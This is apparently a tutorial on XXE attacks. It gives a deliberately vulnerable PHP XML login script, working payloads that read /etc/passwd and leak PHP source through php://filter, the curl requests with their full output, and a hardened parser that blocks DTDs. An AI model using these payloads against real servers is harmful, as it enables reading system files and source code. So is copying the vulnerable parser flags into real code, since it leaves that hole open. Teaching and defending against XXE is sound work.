Today we will be exploring XXE (XML External Entity) attacks. An XXE attack is an attack against an application that accepts XML as its input.
This is our vulnerable PHP code:

xml.php:
<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->user;
$pass = $creds->pass;
echo "You have logged in as user $user";
?>
Our goal here is to submit a malicious XML file whose document type definition (DTD) declares an external entity, so that we can read local files on the server. This is the XML file we will POST to the application. If everything goes well, the response will contain the contents of /etc/passwd.

users.xml:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
We can post this file to the application using the cURL utility.
root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php
You have logged in as user root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false
syslog:x:105:109::/home/syslog:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
ntp:x:107:113::/home/ntp:/bin/false
avahi-autoipd:x:108:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:109:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false
pulse:x:112:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
rtkit:x:114:121:RealtimeKit,,,:/proc:/bin/false
saned:x:115:122::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:117:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
uuidd:x:118:123::/run/uuidd:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
statd:x:119:65534::/var/lib/nfs:/bin/false
mysql:x:120:127:MySQL Server,,,:/nonexistent:/bin/false
openldap:x:121:128:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
test:x:1001:1001:test test,333,555-444-3212,:/home/test:/bin/bash
snmp:x:122:129::/var/lib/snmp:/usr/sbin/nologin
clare:x:1002:1002:clare chapman,100,555-222-1234,:/home/clare:/bin/bash
vance:x:1003:1003:vance perkins,101,,:/home/vance:/bin/bash
sasha:x:1004:1004:sasha kim,102,,:/home/sasha:/bin/bash
hayden:x:1005:1005:hayden sutton,103,,:/home/hayden:/bin/bash
jared:x:1006:1006:jared beck,104,,:/home/jared:/bin/bash
dovecot:x:124:132:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:125:133:Dovecot login user,,,:/nonexistent:/bin/false
bind:x:126:134::/var/cache/bind:/bin/false
ftp:x:127:135:ftp daemon,,,:/srv/ftp:/bin/false
sshd:x:128:65534::/var/run/sshd:/usr/sbin/nologin
user434:x:1007:1007:,,,:/home/user434:/bin/bash
postfix:x:123:130::/var/spool/postfix:/bin/false
muser342:x:1008:1008:,,,:/home/muser342:/bin/bash
muser455:x:1009:1009:,,,:/home/muser455:/bin/bash
muser123:x:1010:1010:,,,:/home/muser123:/bin/bash
muser324:x:1011:1011:,,,:/home/muser324:/bin/bash
muser223:x:1012:1012:,,,:/home/muser223:/bin/bash
root@asus:~/public_html%
As you can see, the tainted XML file was POSTed to the server, and the parser expanded the external entity, so the response contained the contents of the /etc/passwd file.
Using PHP Filters with XXE
You can also use PHP stream filters to read local (and, depending on configuration, remote) files on the server through the convert.base64-encode filter. Because the file is base64-encoded before it is placed in the entity, PHP source code comes back intact instead of being parsed as XML, so we can read the source of files on the web server.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=info.php" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
If we load up our request in cURL and submit the POST we should get the source of the info.php file base64 encoded.
root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php
You have logged in as user PD9waHAgcGhwaW5mbygpOz8+Cg==
root@asus:~/public_html%
If we base64-decode the string from the response, we get the source of info.php:

root@asus:~/public_html% echo PD9waHAgcGhwaW5mbygpOz8+Cg== | base64 -d
<?php phpinfo();?>
root@asus:~/public_html%
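For the defender's side, here is a hardened counterpart to xml.php that closes both the file:///etc/passwd read and the php://filter source read shown above. It is an example added here, not the post's code, and it assumes the same creds document shape and PHP 7.4 or later.

```php
<?php
// Hardened counterpart to xml.php (added example, not the post's code).
// Reads the POST body, refuses any document that carries a DTD, and parses
// with entity substitution and external DTD loading left off.

if (PHP_VERSION_ID < 80000) {
    // PHP < 8.0 enables the external entity loader by default; switch it off.
    // PHP 8.0+ disables it permanently and deprecates this call, hence the guard.
    libxml_disable_entity_loader(true);
}
libxml_use_internal_errors(true); // collect parser errors instead of printing warnings

$xmlfile = file_get_contents('php://input');

// Cheap first gate: a login document never needs a DOCTYPE or entity declaration.
if (stripos($xmlfile, '<!DOCTYPE') !== false || stripos($xmlfile, '<!ENTITY') !== false) {
    http_response_code(400);
    error_log('XXE attempt blocked: DTD in request body');
    exit('DTD not allowed');
}

$dom = new DOMDocument();
// No LIBXML_NOENT (no entity substitution), no LIBXML_DTDLOAD (no external DTD);
// LIBXML_NONET also forbids any network access during parsing.
if ($dom->loadXML($xmlfile, LIBXML_NONET) === false || $dom->doctype !== null) {
    http_response_code(400);
    exit('Malformed XML');
}

$creds = simplexml_import_dom($dom);
$user  = (string) $creds->user;
$pass  = (string) $creds->pass; // the credential check itself is out of scope here

// Escape before reflecting user-controlled data into HTML.
echo 'You have logged in as user ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8');
```

A plain document such as <creds><user>sam</user><pass>x</pass></creds> still parses normally; both users.xml payloads above carry a DOCTYPE and are rejected with HTTP 400 before any entity is resolved.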